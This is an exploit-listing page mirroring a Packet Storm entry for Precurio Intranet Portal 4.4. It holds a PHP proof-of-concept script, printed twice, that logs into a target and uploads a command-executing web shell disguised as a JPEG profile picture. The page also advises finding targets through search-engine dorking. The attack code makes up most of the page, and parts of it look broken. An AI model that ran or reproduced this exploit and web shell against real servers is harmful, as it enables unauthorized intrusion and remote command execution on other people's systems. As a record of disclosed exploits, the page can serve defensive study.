📄 Precurio Intranet Portal 4.4 Cross Site Request Forgery /...

Description

Precurio Intranet Portal version 4.4 proof of concept cross site request forgery and remote shell upload exploit...

Basic Information

ID PACKETSTORM:215644

Published Feb 16, 2026 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Precurio Intranet Portal 4.4 shell upload Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) |
| # Vendor : https://www.precurio.com |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.

(Related : https://packetstorm.news/files/id/189604/ Related CVE numbers: ) .

[+] save code as poc.php.

[+] Usage: php script.php <url> <username> <password>

[+] PayLoad :

<?php

function simulate_login($session, $url, $username, $password) {
try {
echo "Logging in...\n";
sleep(1);
$login_url = "{$url}/public/default/login/submit";
$headers = [
"User-Agent" => "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0",
"Content-Type" => "application/x-www-form-urlencoded"
];
$data = [
"username" => $username,
"password" => $password
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $login_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

if (strpos($response, "Welcome System") !== false) {
echo "Login Successful!\n";
sleep(1);
return true;
} else {
echo "Login Failed!\n";
return false;
}
} catch (Exception $e) {
echo "An error occurred during login: {$e->getMessage()}\n";
return false;
}
}

function upload_file($session, $url) {
try {
echo "Shell Preparing...\n";
sleep(1);
$upload_url = "{$url}/public/user/profile/update";
$random_filename = substr(str_shuffle("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"), 0, 5) . ".php";
$file_content = '<html><body><form method="GET" name="<?php echo basename($_SERVER[\'PHP_SELF\']); ?>"><input type="TEXT" name="cmd" autofocus id="cmd" size="80"><input type="SUBMIT" value="Execute"></form><pre><?php if(isset($_GET[\'cmd\'])){ system($_GET[\'cmd\']); } ?></pre></body></html>';

$file = [
"profile_pic" => new CURLFile('php://temp', 'image/jpeg', $file_content)
];

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $upload_url);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, ['profile_pic' => new CURLFile($file_content)]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
$response = curl_exec($ch);
curl_close($ch);

echo "Upload Response Status: " . (isset($response['status_code']) ? $response['status_code'] : "unknown") . "\n";

if (strpos($response, ".php") !== false) {
$path = extract_php_path($response);
echo "Your shell is ready: {$url}/{$path}\n";
} else {
echo "Exploit Failed!\n";
echo substr($response, 0, 500) . "\n";
}
} catch (Exception $e) {
echo "An error occurred during file upload: {$e->getMessage()}\n";
}
}

function extract_php_path($html_content) {
if (preg_match('/src="([^"]+\.php)"/', $html_content, $matches)) {
return $matches[1];
}
return "Path not found";
}

if ($argc != 4) {
echo "Usage: php script.php <url> <username> <password>\n";
exit(1);
}

$url = $argv[1];
$username = $argv[2];
$password = $argv[3];

$session = curl_init();

if (simulate_login($session, $url, $username, $password)) {
upload_file($session, $url);
} else {
echo "Cannot proceed without a valid login.\n";
}
?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2026-02-16T17:44:47",
    "description": "Precurio Intranet Portal version 4.4 proof of concept cross site request forgery and remote shell upload exploit...",
    "published": "2026-02-16T00:00:00",
    "modified": "2026-02-16T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Precurio Intranet Portal 4.4 Cross Site Request Forgery / Shell Upload",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:215644",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Precurio Intranet Portal 4.4 shell upload Vulnerability                                                                     |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits)                                                            |\n    | # Vendor    : https://www.precurio.com                                                                                                    |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Dorking \u0130n Google Or Other Search Enggine.\n    \n    [+] Code Description: The script performs an attack on a website's control panel by exploiting CSRF vulnerabilities and uploading a shell via the website's administrative interface.\n    \n       (Related : https://packetstorm.news/files/id/189604/ Related CVE numbers:  ) .\n    \t\n    [+] save code as poc.php.\n    \n    [+] Usage: php script.php <url> <username> <password>\n    \n    [+] PayLoad :\n    \n    <?php\n    \n    function simulate_login($session, $url, $username, $password) {\n        try {\n            echo \"Logging in...\\n\";\n            sleep(1);\n            $login_url = \"{$url}/public/default/login/submit\";\n            $headers = [\n                \"User-Agent\" => \"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0\",\n                \"Content-Type\" => \"application/x-www-form-urlencoded\"\n            ];\n            $data = [\n                \"username\" => $username,\n                \"password\" => $password\n            ];\n    \n            $ch = curl_init();\n            curl_setopt($ch, CURLOPT_URL, $login_url);\n            curl_setopt($ch, CURLOPT_POST, true);\n            curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));\n            curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            $response = curl_exec($ch);\n            curl_close($ch);\n    \n            if (strpos($response, \"Welcome System\") !== false) {\n                echo \"Login Successful!\\n\";\n                sleep(1);\n                return true;\n            } else {\n                echo \"Login Failed!\\n\";\n                return false;\n            }\n        } catch (Exception $e) {\n            echo \"An error occurred during login: {$e->getMessage()}\\n\";\n            return false;\n        }\n    }\n    \n    function upload_file($session, $url) {\n        try {\n            echo \"Shell Preparing...\\n\";\n            sleep(1);\n            $upload_url = \"{$url}/public/user/profile/update\";\n            $random_filename = substr(str_shuffle(\"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789\"), 0, 5) . \".php\";\n            $file_content = '<html><body><form method=\"GET\" name=\"<?php echo basename($_SERVER[\\'PHP_SELF\\']); ?>\"><input type=\"TEXT\" name=\"cmd\" autofocus id=\"cmd\" size=\"80\"><input type=\"SUBMIT\" value=\"Execute\"></form><pre><?php if(isset($_GET[\\'cmd\\'])){ system($_GET[\\'cmd\\']); } ?></pre></body></html>';\n    \n            $file = [\n                \"profile_pic\" => new CURLFile('php://temp', 'image/jpeg', $file_content)\n            ];\n    \n            $ch = curl_init();\n            curl_setopt($ch, CURLOPT_URL, $upload_url);\n            curl_setopt($ch, CURLOPT_POST, true);\n            curl_setopt($ch, CURLOPT_POSTFIELDS, ['profile_pic' => new CURLFile($file_content)]);\n            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n            $response = curl_exec($ch);\n            curl_close($ch);\n    \n            echo \"Upload Response Status: \" . (isset($response['status_code']) ? $response['status_code'] : \"unknown\") . \"\\n\";\n    \n            if (strpos($response, \".php\") !== false) {\n                $path = extract_php_path($response);\n                echo \"Your shell is ready: {$url}/{$path}\\n\";\n            } else {\n                echo \"Exploit Failed!\\n\";\n                echo substr($response, 0, 500) . \"\\n\";\n            }\n        } catch (Exception $e) {\n            echo \"An error occurred during file upload: {$e->getMessage()}\\n\";\n        }\n    }\n    \n    function extract_php_path($html_content) {\n        if (preg_match('/src=\"([^\"]+\\.php)\"/', $html_content, $matches)) {\n            return $matches[1];\n        }\n        return \"Path not found\";\n    }\n    \n    if ($argc != 4) {\n        echo \"Usage: php script.php <url> <username> <password>\\n\";\n        exit(1);\n    }\n    \n    $url = $argv[1];\n    $username = $argv[2];\n    $password = $argv[3];\n    \n    $session = curl_init();\n    \n    if (simulate_login($session, $url, $username, $password)) {\n        upload_file($session, $url);\n    } else {\n        echo \"Cannot proceed without a valid login.\\n\";\n    }\n    ?>\n    \n    \n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/215644",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/215644/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Precurio Intranet Portal 4.4 Cross Site Request Forgery / Shell Upload_PACKETSTORM:215644

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply